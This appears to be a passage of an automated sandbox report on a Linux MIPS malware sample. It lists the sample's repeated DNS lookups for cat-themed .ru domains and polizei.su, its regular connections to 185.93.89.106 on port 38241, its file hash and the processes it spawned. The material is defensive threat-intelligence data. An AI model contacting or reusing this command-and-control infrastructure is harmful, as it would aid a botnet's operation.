                                                                                            Feb 10, 2025 20:19:36.642935991 CET42836443192.168.2.2391.189.91.43
                                                                                            Feb 10, 2025 20:19:37.011665106 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:37.016452074 CET3824139808185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:37.016532898 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:37.017328024 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:37.022114038 CET3824139808185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:37.022223949 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:37.027053118 CET3824139808185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:37.618778944 CET3824139808185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:37.619026899 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:37.619026899 CET3980838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:38.631560087 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:38.636378050 CET3824139810185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:38.636487961 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:38.637336016 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:38.642124891 CET3824139810185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:38.642179012 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:38.646962881 CET3824139810185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:39.273171902 CET3824139810185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:39.273324966 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:39.273360014 CET3981038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.282022953 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.286844969 CET3824139812185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:40.286931992 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.287741899 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.292546034 CET3824139812185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:40.292653084 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.297413111 CET3824139812185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:40.916739941 CET3824139812185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:40.916851997 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:40.916887999 CET3981238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:41.929209948 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:41.934031010 CET3824139814185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:41.934084892 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:41.935401917 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:41.940201044 CET3824139814185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:41.940253019 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:41.945036888 CET3824139814185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:42.540921926 CET3824139814185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:42.541040897 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:42.541069984 CET3981438241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:42.786083937 CET4251680192.168.2.23109.202.202.202
                                                                                            Feb 10, 2025 20:19:43.550326109 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:43.555171967 CET3824139816185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:43.555223942 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:43.555979967 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:43.560791969 CET3824139816185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:43.560862064 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:43.565629005 CET3824139816185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:44.181881905 CET3824139816185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:44.181989908 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:44.182065964 CET3981638241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.191977024 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.196809053 CET3824139818185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:45.196880102 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.197587967 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.202418089 CET3824139818185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:45.202477932 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.207251072 CET3824139818185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:45.798624992 CET3824139818185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:45.798785925 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:45.798839092 CET3981838241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:46.812858105 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:46.817629099 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:46.817732096 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:46.818837881 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:46.823652029 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:46.823724031 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:46.828481913 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:56.824743986 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:56.829514027 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:57.005007029 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:57.005222082 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:20:07.362708092 CET43928443192.168.2.2391.189.91.42
                                                                                            Feb 10, 2025 20:20:57.048692942 CET3982038241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:20:57.053467035 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:20:57.227099895 CET3824139820185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:20:57.227226019 CET3982038241192.168.2.23185.93.89.106
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 10, 2025 20:19:06.035664082 CET5474753192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:06.046868086 CET53547478.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:07.687824965 CET5379553192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:07.694024086 CET53537958.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:09.309350014 CET5181853192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:09.319225073 CET53518188.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:10.930294037 CET5867753192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:10.937371969 CET53586778.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:12.553571939 CET4048553192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:12.559606075 CET53404858.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:14.204818964 CET4189253192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:14.215015888 CET53418928.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:15.823807955 CET4812353192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:15.830106020 CET53481238.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:17.438718081 CET3586153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:17.445199966 CET53358618.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:19.075818062 CET3467053192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:19.082258940 CET53346708.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:20.692090034 CET4953753192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:20.698409081 CET53495378.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:22.307334900 CET3509153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:22.313688993 CET53350918.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:23.943536997 CET5707153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:23.949820995 CET53570718.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:25.581204891 CET4044153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:25.591725111 CET53404418.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:27.200854063 CET5956253192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:27.207133055 CET53595628.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:28.840704918 CET3300953192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:28.850476027 CET53330098.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:30.470890999 CET5607253192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:30.477186918 CET53560728.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:32.105933905 CET5640653192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:32.112411022 CET53564068.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:33.749121904 CET4266553192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:33.757278919 CET53426658.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:35.373346090 CET4178553192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:35.379652023 CET53417858.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:37.004863977 CET3659353192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:37.011177063 CET53365938.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:38.620922089 CET5694153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:38.631000996 CET53569418.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:40.275243998 CET5545753192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:40.281546116 CET53554578.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:41.918669939 CET4530253192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:41.928793907 CET53453028.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:43.543194056 CET5247553192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:43.549595118 CET53524758.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:45.184030056 CET4495153192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:45.191304922 CET53449518.8.8.8192.168.2.23
                                                                                            Feb 10, 2025 20:19:46.801718950 CET4455653192.168.2.238.8.8.8
                                                                                            Feb 10, 2025 20:19:46.812145948 CET53445568.8.8.8192.168.2.23
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Feb 10, 2025 20:19:06.035664082 CET192.168.2.238.8.8.80xe98eStandard query (0)cat-are-here.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:07.687824965 CET192.168.2.238.8.8.80xba8bStandard query (0)kittler.ru. [malformed]256299false
                                                                                            Feb 10, 2025 20:19:09.309350014 CET192.168.2.238.8.8.80xbff1Standard query (0)gokittler.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:10.930294037 CET192.168.2.238.8.8.80xbda6Standard query (0)cats-master.ru. [malformed]256302false
                                                                                            Feb 10, 2025 20:19:12.553571939 CET192.168.2.238.8.8.80x1e5cStandard query (0)polizei.su. [malformed]256304false
                                                                                            Feb 10, 2025 20:19:14.204818964 CET192.168.2.238.8.8.80x14b1Standard query (0)kittlerer.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:15.823807955 CET192.168.2.238.8.8.80x9ed5Standard query (0)polizei.su. [malformed]256307false
                                                                                            Feb 10, 2025 20:19:17.438718081 CET192.168.2.238.8.8.80xacccStandard query (0)kittlez.ru. [malformed]256309false
                                                                                            Feb 10, 2025 20:19:19.075818062 CET192.168.2.238.8.8.80xca13Standard query (0)newkittler.ru. [malformed]256311false
                                                                                            Feb 10, 2025 20:19:20.692090034 CET192.168.2.238.8.8.80x1a96Standard query (0)kittlerer.ru. [malformed]256312false
                                                                                            Feb 10, 2025 20:19:22.307334900 CET192.168.2.238.8.8.80x4e3eStandard query (0)kittlerer.ru. [malformed]256314false
                                                                                            Feb 10, 2025 20:19:23.943536997 CET192.168.2.238.8.8.80x4ea1Standard query (0)gokittler.ru. [malformed]256315false
                                                                                            Feb 10, 2025 20:19:25.581204891 CET192.168.2.238.8.8.80xe9c3Standard query (0)cuttiecats.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:27.200854063 CET192.168.2.238.8.8.80x86c4Standard query (0)kittlerer.ru. [malformed]256319false
                                                                                            Feb 10, 2025 20:19:28.840704918 CET192.168.2.238.8.8.80x7483Standard query (0)cats-master.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:30.470890999 CET192.168.2.238.8.8.80xc579Standard query (0)qittler.ru. [malformed]256322false
                                                                                            Feb 10, 2025 20:19:32.105933905 CET192.168.2.238.8.8.80x774bStandard query (0)thekittler.ru. [malformed]256324false
                                                                                            Feb 10, 2025 20:19:33.749121904 CET192.168.2.238.8.8.80xf95dStandard query (0)gokittler.ru. [malformed]256325false
                                                                                            Feb 10, 2025 20:19:35.373346090 CET192.168.2.238.8.8.80x75b8Standard query (0)mykittler.ru. [malformed]256327false
                                                                                            Feb 10, 2025 20:19:37.004863977 CET192.168.2.238.8.8.80xc9b3Standard query (0)polizei.su. [malformed]256329false
                                                                                            Feb 10, 2025 20:19:38.620922089 CET192.168.2.238.8.8.80x3baaStandard query (0)cats-master.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:40.275243998 CET192.168.2.238.8.8.80xf20eStandard query (0)kittlez.ru. [malformed]256332false
                                                                                            Feb 10, 2025 20:19:41.918669939 CET192.168.2.238.8.8.80x52a3Standard query (0)mykittler.ruA (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:43.543194056 CET192.168.2.238.8.8.80xad5cStandard query (0)qittler.ru. [malformed]256335false
                                                                                            Feb 10, 2025 20:19:45.184030056 CET192.168.2.238.8.8.80x9c08Standard query (0)qittler.ru. [malformed]256337false
                                                                                            Feb 10, 2025 20:19:46.801718950 CET192.168.2.238.8.8.80xc31dStandard query (0)mykittler.ruA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Feb 10, 2025 20:19:06.046868086 CET8.8.8.8192.168.2.230xe98eNo error (0)cat-are-here.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:09.319225073 CET8.8.8.8192.168.2.230xbff1No error (0)gokittler.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:14.215015888 CET8.8.8.8192.168.2.230x14b1No error (0)kittlerer.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:25.591725111 CET8.8.8.8192.168.2.230xe9c3No error (0)cuttiecats.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:28.850476027 CET8.8.8.8192.168.2.230x7483No error (0)cats-master.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:38.631000996 CET8.8.8.8192.168.2.230x3baaNo error (0)cats-master.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:41.928793907 CET8.8.8.8192.168.2.230x52a3No error (0)mykittler.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                            Feb 10, 2025 20:19:46.812145948 CET8.8.8.8192.168.2.230xc31dNo error (0)mykittler.ru185.93.89.106A (IP address)IN (0x0001)false

                                                                                            System Behavior

                                                                                            Start time (UTC):19:19:03
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/tmp/mips.elf
                                                                                            Arguments:/tmp/mips.elf
                                                                                            File size:5777432 bytes
                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                            Start time (UTC):19:19:03
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/tmp/mips.elf
                                                                                            Arguments:-
                                                                                            File size:5777432 bytes
                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                            Start time (UTC):19:19:03
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/tmp/mips.elf
                                                                                            Arguments:-
                                                                                            File size:5777432 bytes
                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                            Start time (UTC):19:19:04
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/tmp/mips.elf
                                                                                            Arguments:-
                                                                                            File size:5777432 bytes
                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                            Start time (UTC):19:19:04
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/tmp/mips.elf
                                                                                            Arguments:-
                                                                                            File size:5777432 bytes
                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                            Start time (UTC):19:19:04
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/sbin/gdm3
                                                                                            Arguments:-
                                                                                            File size:453296 bytes
                                                                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                            Start time (UTC):19:19:04
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/etc/gdm3/PrimeOff/Default
                                                                                            Arguments:/etc/gdm3/PrimeOff/Default
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/sbin/gdm3
                                                                                            Arguments:-
                                                                                            File size:453296 bytes
                                                                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/etc/gdm3/PrimeOff/Default
                                                                                            Arguments:/etc/gdm3/PrimeOff/Default
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfdesktop
                                                                                            Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                            File size:473520 bytes
                                                                                            MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-panel
                                                                                            Arguments:xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
                                                                                            File size:375768 bytes
                                                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfwm4
                                                                                            Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                            File size:420424 bytes
                                                                                            MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfdesktop
                                                                                            Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                            File size:473520 bytes
                                                                                            MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-panel
                                                                                            Arguments:xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
                                                                                            File size:375768 bytes
                                                                                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfwm4
                                                                                            Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                            File size:420424 bytes
                                                                                            MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfce4-session
                                                                                            Arguments:-
                                                                                            File size:264752 bytes
                                                                                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                            Start time (UTC):19:19:05
                                                                                            Start date (UTC):10/02/2025
                                                                                            Path:/usr/bin/xfdesktop
                                                                                            Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                            File size:473520 bytes
                                                                                            MD5 hash:dfb13e1581f80065dcea16f2476f16f2